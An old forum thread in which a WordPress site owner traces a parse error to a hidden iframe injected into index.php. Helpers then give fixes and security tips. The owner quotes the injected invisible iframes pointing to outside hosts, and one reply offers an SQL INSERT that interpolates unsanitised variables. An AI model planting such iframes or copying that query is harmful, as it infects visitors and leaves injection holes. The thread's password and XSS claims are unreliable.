PHP Parse Error

Aarlev

Member
I'm getting this error when trying to access my website:

Parse error: syntax error, unexpected '?' in /home/sorenaa1/public_html/index.php on line 18

I haven't touched my index.php file. All I did was update my blog earlier today and it worked fine after that. But now I get this? What the hell is going on. Do I just call my hosting company or can I fix it easily.

Code:
<?php get_header(); ?> <div id="top-content">          <p class="about-text">    My name is Soeren Aarlev and this is my blog.     I'm originally from Denmark, but moved to London in 2006     and currently work as a professional Web Designer for a     small agency in the South East. I'm always on the look out     for new exciting projects, so if you have something in mind,     <a href="[URL]http://sorenaarlev.com/contact">drop[/URL] me a line.</a>     </p>     <ul id="find-me-on"> <li><a href="[URL="http://www.flickr.com/aarlev"]Flickr: Soeren Aarlev's Photostream[/URL]" title="Flickr">Flickr</a></li>   <li><a href="[URL="http://www.linkedin.com/pub/b/b88/793"]Soeren Aarlev - LinkedIn[/URL]" title="LinkedIn">Linkedin</a></li>    <li><a href="[URL="http://twitter.com/sorenaarlev"]Twitter / sorenaarlev[/URL]" title="Twitter">Twitter</a></li>    <li><a href="[URL="http://www.last.fm/user/sorenaarlev"]sorenaarlev?s Music Profile ? Users at Last.fm[/URL]" title="Last FM">Last FM</a></li>    <li><a href="[URL="http://del.icio.us/aarlev"]aarlev's Bookmarks on Delicious[/URL]" title="Delicious">Delicious</a></li>     </ul>    <div class="clear"></div>    </div>     <div id="main-content"> <div id="col-1">   <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <div <?php post_class() ?> id="post-<?php the_ID(); ?>">  <h2 class="storytitle"><a href="<?php the_permalink() ?>" rel="bookmark"><?php the_title(); ?></a></h2>  <?php the_date('','<h3 class="date">','</h3>'); ?>   <div class="feedback">  <?php wp_link_pages(); ?>  <?php comments_popup_link(__('Comments (0)'), __('Comments (1)'), __('Comments (%)')); ?> </div><div class="clear"></div>  <div class="storycontent">  <?php the_content(__('Read More...')); ?>  </div> </div><?php comments_template(); // Get wp-comments.php template ?><?php endwhile; else: ?><p><?php _e('Sorry, no posts matched your criteria.'); ?></p><?php endif; ?><?php posts_nav_link(' — ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?></div><div id="col-2"><?php include(TEMPLATEPATH . '/sidebar1.php'); ?></div><div id="col-3"><?php include(TEMPLATEPATH . '/sidebar2.php'); ?></div><div class="clear"></div></div></div><?php get_footer(); ?></body></html>
 
I'm gonna go out on a limb here, but maybe if you check around line 18, for something like a question mark ;)

Is it WP driven yeah? If it's line 18 I'd suggest looking in header.php for anything awry.
 
Thanks for your help. That's just really weird cause I haven't touched my header.php since I built the site a couple of months ago.

Don't really know much .PHP but can't find anything on line 18. There's a question mark there but is that not supposed to be there? I'm a bit afraid of messing with the .PHP myself as I don't really know what I'm doing.

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "[URL]http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd[/URL]"><html xmlns="[url=http://www.w3.org/1999/xhtml]XHTML namespace[/url]" <?php language_attributes(); ?>><head profile="[url=http://gmpg.org/xfn/11]XFN 1.1 profile[/url]"> <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" /> <title><?php wp_title('&laquo;', true, 'right'); ?> <?php bloginfo('name'); ?> - Portfolio of London based Web and Graphic Designer Soren Aarlev</title> <style type="text/css" media="screen">  @import url( <?php bloginfo('stylesheet_url'); ?> ); </style><link rel="icon"       type="image/png"       href="[URL]http://sorenaarlev.com/wp-content/themes/sorenaarlev/gfx/myicon.png[/URL]" /> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" /> <link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" /> <link rel="alternate" type="application/atom+xml" title="Atom 1.0" href="<?php bloginfo('atom_url'); ?>" /> <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> <?php wp_get_archives('type=monthly&format=link'); ?> <?php //comments_popup_script(); // off by default ?> <?php wp_head(); ?></head><body><div id="wrapper"><div id="header">      <h1><a href="[URL]http://sorenaarlev.com[/URL]" title="Soren Aarlev, Web and Graphic Designer">Soeren Aarlev: Web and Graphic Designer based in London</a></h1>       <ul id="navigation">       <?php wp_list_pages('title_li=&depth=1'); ?>      </ul> </div>
 
Hmm, try deleting:
<?php //comments_popup_script(); // off by default ?>

It's all commented out anyway.
 
Hay buddy can you post lines 10-20 of the index.php file.
Can you also label line 18 so I know which line is which. :)

Jaz
 
Hay buddy it is an easy fix, but if it was working fine and then just went like that, err......a hack sounds likely, it wouldn't just mess up on it's own.

If it is that makes 2 in an hour, that I've heard about, 1 of my mates has literally has just been done, well that's what you get for a £150 e-commerce design using a free template. :lol:

But it wouldn't mess up on it's own buddy.

Get me those lines and it should be an easy fix, and I, or someone else here, should be able to tell you more.

Is your server hosted or your own?

Jaz
 
Thanks so much for your help Jaz. The site is hosted. Well it must have been hacked then cause all I did yesterday was make a blog post. And after I started getting the error I checked the index.php file and there was some weird Iframe code in the bottom and I definitely didn't put that there. Anyways here's the first lines of the index.php but it doesn't look like there's anything wrong there.

EDIT: I tried deleting that line Harry, but unfortunately it still doesn't work.

3311379484_996742f220_o.gif
 
Was searching a bit and found another post on another forum with another site that has been hacked. this one had this in the bottom of the index.php. That's exactly what happened to me as well. Unfortunately I deleted the iframe code straight away in the hope that it would fix my site but it didn't. But it was something similar to this.

<iframe src="http://adult.oo.lv/15/js_go_f1.php" style="display:none"></iframe>

EDIT: Ok found the exact Iframe Hack as I googled it yesterday. This was what was in the bottom of my Index.php

<iframe src="http://betstarwager.cn/in.cgi?cocacola70" width=1 height=1 style="visibility: hidden"></iframe>

Anyone familiar with this hack and how to get rid of it?


 
Ok I just updated to Wordpress 2.7.1 and that solved the problem! :clap:

Anything you can do to prevent these attacks?
 
OK Aarlev we'll run through a few things, but if the hacker is on the same server as you there is very little you can do as anyone on your server can technically read, and change your, files.

But ~
1. Do allow image uploads?
2. Do you have a db that is interacted by input fields, search, avatar etc....
3. Do you have secure enough passwords?
4. Is your version of wordpress up-to-date.

If you ever use someone else's custom built code, sign up to their RSS feeds and check it daily, as soon as an update comes available make it a priority to upgrade as they tend to contain security fixes.

My mate was done by his CMS only requiring a password, which is pure madness, and him having his password as his name.

Passwords to your CMS should be a minimum of 8 characters contain both letters, in upper and lower case, and numbers and if permitted special characters as well, and no direct words!!!!

So for example something like this is extremely secure~

aN7YJ%&Lhj[]@A.a

Over ~
Banana.

Save it to your inbox in your email as a draft, don't label it, just save it as a blank email with the contents of aN7YJ%&Lhj[]@A.a, and copy and paste it to your input box every time you log on.

But remember to clear your clipboard once you do, as an XSS attack on another site you visit could then get your history and your clipboard. It would then be easy for them then to see yoursite/login.php as a visited page and the contents of the clipboard ~ aN7YJ%&Lhj[]@A.a, and wella they are in with no problems.

Unless it happens again I wouldn't report it to your hosting either, they will move you off the server, to get around the hacker on the same server as you as a precaution. Now the problem with this is the search engines don't like it TBH and you may lose rankings.

If it happens again, and the answer to the above questions is no, I would say it is someone on your server report it to them and they will look into it.

If you do have any of the above let me know and I'll help you make sure the code is secure. :)

Jaz
 
1. Do allow image uploads? - I don't know, I just upload images to my server via FTP.
2. Do you have a db that is interacted by input fields, search, avatar etc.... - Not really sure what this means. I just used fantastico to do an auto install of wordpress. I've got a contact form on my site that I guess interacts with the DB and the comments on my blog etc. I started getting loads of spam comments on my blog posts for a while before the hack happened.
3. Do you have secure enough passwords? - Yeah changed it today to something with numbers and upper/lowercase. The thingie in Wordpress said it was 'Secure'
4. Is your version of wordpress up-to-date - Yep, just updated to the latest version today, which also fixed my site.

I'm not using anybody elses custom built code. I just copied the PHP snippets etc, from the Default Wordpress Theme and used my own XHTML/CSS. And I've memorised my new password so it's not in my email or anything.

I don't understand what someone gets out of hacking my site. Probably some greasy teenager wanking in a basement with nothing better to do. F*cking annoying.


But thanks for your help Jaz! Much appreciated mate!
 
Aarlev said:
I don't understand what someone gets out of hacking my site. Probably some greasy teenager wanking in a basement with nothing better to do. F*cking annoying.

It's probably just automated attacks Soren, there's a lot around that will search for files with open permissions on Wordpress setups then add snippets of code such as invisible links to get the linkback and page rank from the site. I wouldn't personally worry about it being a personal attack.

Hope you've got it all resolved now :up:
 
Greg said:
It's probably just automated attacks Soren, there's a lot around that will search for files with open permissions on Wordpress setups then add snippets of code such as invisible links to get the linkback and page rank from the site. I wouldn't personally worry about it being a personal attack.

Hope you've got it all resolved now :up:

Oh..right..I see :D. Well those automated attacks are w*nkers as well! :( :)

Yeah it's all fixed now, just hope it stays that way. Thanks Greg.
 
Image uploads as in avatars?
Send me your validation code for your comment script and I'll have a look to see if it can be manipulated. But the thing about the password is theoretically any password can be broken even using SSL, even though a SSL password could take as long as 10 0x37 years to crack I think, could be wrong but it is a ridiculously long time.

Now any password that does not use SSL can and will be broken over time. The trick is to make that time period as long a possible, then it is just pointless waste of time and resources and they move on to easier targets. Therefore the longer the password is and the more different random letters it contains helps to increase it's "secureness".

So it can always be more secure if that makes sense.

But as Greg says it could be for personal gain, or it could be someone practising there skills on "easier" targets, or just someone trying to get recognition from their peeps.

Jaz
 
That is one way of doing it Greg, I had to search for gravatars TBH never heard of it till now, tbh, that wouldn't get rid of all possible attacks using image uploads though depends on how good their screening is TBH.

But a lot of sites I visit don't just use them and still allow image uploads as well, DF being one of them. :)
 
Wordpress setups then add snippets of code such as invisible links to get the linkback and page rank from the site. I wouldn't personally worry about it being a personal attack.
I agree that is 1 of the reasons TBH.
The thing is what they don't get is they are devalued links anyway and wont do them any favours at all well apart from getting a competitors page penalized.
 
Jazajay said:
That is one way of doing it Greg, I had to search for gravatars TBH never heard of it till now, tbh, that wouldn't get rid of all possible attacks using image uploads though depends on how good their screening is TBH.

But a lot of sites I visit don't just use them and still allow image uploads as well, DF being one of them. :)

Fair points Jaz, I can't see any reason why image uploading would be needed by any visitor on a WP blog.
And yes DF does allow image uploads... :blink: (default setting with vB)
 
Great my site is down again now. I just checked and the same Iframe thing is back in the bottom of my index.php file!

What the hell do I do now, this is bloody pain in the arse!

@Jaz : Where can I find the validation code for the comment script?
 
Do you not have any validation then?
Mmmmm......where can you get some, I suppose I could write you some. :lol:
This should do it.

function cleanText($text)
{
$text1=preg_replace('#[^A-Za-z0-9.!, -]#', '', $text);
return $text1;
}


What that does is if it is not a alphabetical character, a number a full stop, exclamation mark a space a comer or a hyphen it gets deleted from the comment.

Then when you go to input it in your db write this ~
INSERT INTO table(row1,row2,row3)VALUES('$row1','$row2','".cleanText($_POST['comment'])."');

Have you got a page address to check it out though as it may not be comment related.
Also the above function needs to go above that code on the page.

Jaz

Key:
Red ~ PHP
 
Back
Top